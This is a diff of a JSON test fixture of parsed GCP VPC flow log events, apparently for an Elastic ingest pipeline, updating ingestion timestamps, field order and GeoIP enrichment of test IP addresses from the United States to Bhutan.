@@ -10964,7 +11499,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391748700Z", + "ingested": "2021-12-14T14:43:27.415230730Z", "original": "{\"insertId\":\"y4wffpfk2ero5\",\"jsonPayload\":{\"bytes_sent\":\"116981\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33540,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789112562Z\",\"packets_sent\":\"234\",\"reporter\":\"SRC\",\"rtt_msec\":\"313\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074813982Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074813982Z", @@ -10986,11 +11521,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33690, 
@@ -11062,7 +11602,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391754200Z", + "ingested": "2021-12-14T14:43:27.415231124Z", "original": "{\"insertId\":\"y4wffpfk2eroo\",\"jsonPayload\":{\"bytes_sent\":\"67789\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33690},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.542406314Z\",\"packets_sent\":\"344\",\"reporter\":\"DEST\",\"rtt_msec\":\"196\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075867049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075867049Z", @@ -11078,11 +11618,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33538, 
@@ -11160,7 +11705,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391759800Z", + "ingested": "2021-12-14T14:43:27.415231572Z", "original": "{\"insertId\":\"ptjoddfhmrhg9\",\"jsonPayload\":{\"bytes_sent\":\"136166\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33538,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565124617Z\",\"packets_sent\":\"245\",\"reporter\":\"SRC\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074952616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074952616Z", 
@@ -11171,9 +11716,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:15.857Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.139.99.242" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 220 + } + } + }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -11182,13 +11757,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65257, 
@@ -11196,6 +11774,16 @@ "ip": "67.43.156.13", "packets": 718 }, + "event": { + "ingested": "2021-12-14T14:43:27.415231965Z", + "original": "{\"insertId\":\"ptjoddfhmrhgh\",\"jsonPayload\":{\"bytes_sent\":\"68262\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65257},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"718\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.403388091Z", + "end": "2019-06-14T03:49:56.220614265Z", + "id": "ptjoddfhmrhgh", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -11207,17 +11795,22 @@ "iana_number": "6", "packets": 718, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "67.43.156.14", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -11234,25 +11827,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 220 + "ms": 36 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391765300Z", - "original": "{\"insertId\":\"ptjoddfhmrhgh\",\"jsonPayload\":{\"bytes_sent\":\"68262\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65257},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"718\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.403388091Z", - "end": "2019-06-14T03:49:56.220614265Z", - "id": "ptjoddfhmrhgh", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -11261,11 +11839,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 52328, 
@@ -11273,6 +11856,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415232364Z", + "original": "{\"insertId\":\"ptjoddfhmrhgj\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":52328},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:20.842840991Z", + "end": "2019-06-14T03:42:20.952481728Z", + "id": "ptjoddfhmrhgj", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -11284,7 +11877,9 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -11295,6 +11890,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -11315,21 +11913,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391770800Z", - "original": "{\"insertId\":\"ptjoddfhmrhgj\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":52328},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:20.842840991Z", - "end": "2019-06-14T03:42:20.952481728Z", - "id": "ptjoddfhmrhgj", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -11338,11 +11921,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 59790, 
@@ -11350,6 +11938,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415232756Z", + "original": "{\"insertId\":\"ptjoddfhmrhgr\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":59790},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:50.590894439Z", + "end": "2019-06-14T03:40:50.702194466Z", + "id": "ptjoddfhmrhgr", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -11361,17 +11959,22 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.14", - "10.87.40.76" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -11388,25 +11991,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 36 + "ms": 62 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391776400Z", - "original": "{\"insertId\":\"ptjoddfhmrhgr\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":59790},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:50.590894439Z", - "end": "2019-06-14T03:40:50.702194466Z", - "id": "ptjoddfhmrhgr", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -11415,13 +12003,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65317, 
@@ -11429,6 +12020,16 @@ "ip": "67.43.156.13", "packets": 728 }, + "event": { + "ingested": "2021-12-14T14:43:27.415233156Z", + "original": "{\"insertId\":\"ptjoddfhmrhgn\",\"jsonPayload\":{\"bytes_sent\":\"73681\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65317},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.740491697Z", + "end": "2019-06-14T03:49:56.220599950Z", + "id": "ptjoddfhmrhgn", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -11440,19 +12041,30 @@ "iana_number": "6", "packets": 728, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 62 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -11463,38 +12075,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 62 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391781900Z", - "original": "{\"insertId\":\"ptjoddfhmrhgn\",\"jsonPayload\":{\"bytes_sent\":\"73681\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65317},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.740491697Z", - "end": "2019-06-14T03:49:56.220599950Z", - "id": "ptjoddfhmrhgn", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", 
"port": 65317, @@ -11508,6 +12102,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415233555Z", + "original": "{\"insertId\":\"ptjoddfhmrhga\",\"jsonPayload\":{\"bytes_sent\":\"92566\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65317,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"596\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.740491697Z", + "end": "2019-06-14T03:49:56.220599950Z", + "id": "ptjoddfhmrhga", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -11519,46 +12123,6 @@ "iana_number": "6", "packets": 596, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:15.857Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 62 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391787400Z", - "original": "{\"insertId\":\"ptjoddfhmrhga\",\"jsonPayload\":{\"bytes_sent\":\"92566\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65317,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"596\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.740491697Z", - "end": "2019-06-14T03:49:56.220599950Z", - "id": "ptjoddfhmrhga", - "category": "network", - "type": "connection" } }, { 
@@ -11573,11 +12137,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33692, @@ -11649,7 +12218,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391792200Z", + "ingested": "2021-12-14T14:43:27.415234007Z", "original": "{\"insertId\":\"ptjoddfhmrhgk\",\"jsonPayload\":{\"bytes_sent\":\"66094\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33692},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565137912Z\",\"packets_sent\":\"360\",\"reporter\":\"DEST\",\"rtt_msec\":\"181\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.558259934Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.558259934Z", 
